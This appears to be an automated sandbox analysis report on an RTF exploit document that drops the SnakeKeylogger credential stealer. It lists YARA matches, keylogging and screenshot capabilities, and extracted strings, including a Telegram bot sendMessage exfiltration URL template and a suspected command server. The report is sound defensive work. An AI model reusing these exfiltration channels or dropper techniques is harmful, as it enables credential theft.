                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407830206.00000000025BB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: EQNEDT32.EXE, 00000002.00000003.403029344.0000000000621000.00000004.00000020.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000005.00000000.402963037.0000000000E82000.00000020.00000001.01000000.00000004.sdmp, qHbynE8Vgwabsy3[1].exe.2.dr, cdlpohayugo39567.exe.2.drString found in binary or memory: http://tempuri.org/DataSet1.xsd
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026EC000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026F4000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026EC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:960781%0D%0ADate%20a
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002615000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                  Source: cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.78
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002615000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.784
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                  Source: cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                  Source: cdlpohayugo39567.exe, 00000007.00000002.911778548.000000000365A000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.0000000003638000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000036EC000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.0000000003692000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.0000000003746000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.000000000370E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49179
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49179 -> 443
                  Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49180 version: TLS 1.2

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to capture screen (.Net source)
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                  Contains functionality to log keystrokes (.Net Source)
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                  System Summary

                  barindex
                  Initial sample is an obfuscated RTF file
                  Source: initial sampleStatic file information: Filename: na.doc
                  Malicious sample detected (through community Yara rule)
                  Source: na.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 7.2.cdlpohayugo39567.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohayugo39567.exe.3e555e8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                  Source: 5.2.cdlpohayugo39567.exe.3ed9e08.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 5.2.cdlpohayugo39567.exe.3dd0dc8.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                  Source: 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: cdlpohayugo39567.exe PID: 3424, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: cdlpohayugo39567.exe PID: 3512, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Office equation editor drops PE file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\qHbynE8Vgwabsy3[1].exeJump to dropped file
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeJump to dropped file
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeProcess Stats: CPU usage > 49%
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_002EA980 NtQueryInformationProcess,5_2_002EA980
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_002EAEE8 NtQueryInformationProcess,5_2_002EAEE8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_002EC4685_2_002EC468
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_002E6BA95_2_002E6BA9
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_002E7E7A5_2_002E7E7A
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_002EA3C05_2_002EA3C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_002EC4585_2_002EC458
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_002EC6C75_2_002EC6C7
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_002EC6D85_2_002EC6D8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_002E9AC85_2_002E9AC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_002E9F005_2_002E9F00
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_00C530C05_2_00C530C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_00C534F85_2_00C534F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_00C52C885_2_00C52C88
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_00C52C545_2_00C52C54
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_00C539D05_2_00C539D0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_00C539E05_2_00C539E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 5_2_00C545105_2_00C54510
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015903A7_2_0015903A
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_001540F87_2_001540F8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015392D7_2_0015392D
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015895E7_2_0015895E
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_001549687_2_00154968
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_001531B17_2_001531B1
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_001572007_2_00157200
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_001582787_2_00158278
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00159BC27_2_00159BC2
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_001543C87_2_001543C8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_001534827_2_00153482
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00153E287_2_00153E28
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00155E707_2_00155E70
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_001546997_2_00154699
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015DEC87_2_0015DEC8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_001567287_2_00156728
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015EA207_2_0015EA20
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015F3517_2_0015F351
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015FC807_2_0015FC80
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015DEB97_2_0015DEB9
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015EEB87_2_0015EEB8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015D7307_2_0015D730
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015D7407_2_0015D740
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_0015F7E87_2_0015F7E8
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00661C607_2_00661C60
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00664E607_2_00664E60
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006680607_2_00668060
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006600407_2_00660040
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006632407_2_00663240
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006664407_2_00666440
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006616207_2_00661620
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006648207_2_00664820
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00667A207_2_00667A20
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00662C007_2_00662C00
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00665E007_2_00665E00
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006690007_2_00669000
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006628E07_2_006628E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00665AE07_2_00665AE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00668CE07_2_00668CE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00660CC07_2_00660CC0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00663EC07_2_00663EC0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006670C07_2_006670C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006622A07_2_006622A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006654A07_2_006654A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006686A07_2_006686A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00660CB07_2_00660CB0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006606807_2_00660680
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006638807_2_00663880
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00666A807_2_00666A80
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006603607_2_00660360
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006635607_2_00663560
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006667607_2_00666760
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006619407_2_00661940
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00664B407_2_00664B40
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00667D407_2_00667D40
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00662F207_2_00662F20
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006661207_2_00666120
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006693207_2_00669320
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006613007_2_00661300
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006645007_2_00664500
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006677007_2_00667700
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00660FE07_2_00660FE0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006641E07_2_006641E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006673E07_2_006673E0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006625C07_2_006625C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006657C07_2_006657C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006689C07_2_006689C0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006609A07_2_006609A0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00663BA07_2_00663BA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00666DA07_2_00666DA0
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_00661F807_2_00661F80
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006651807_2_00665180
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006683807_2_00668380
                  Source: C:\Users\user\AppData\Roaming\cdlpohayugo39567.exeCode function: 7_2_006B87487_2_006B8748
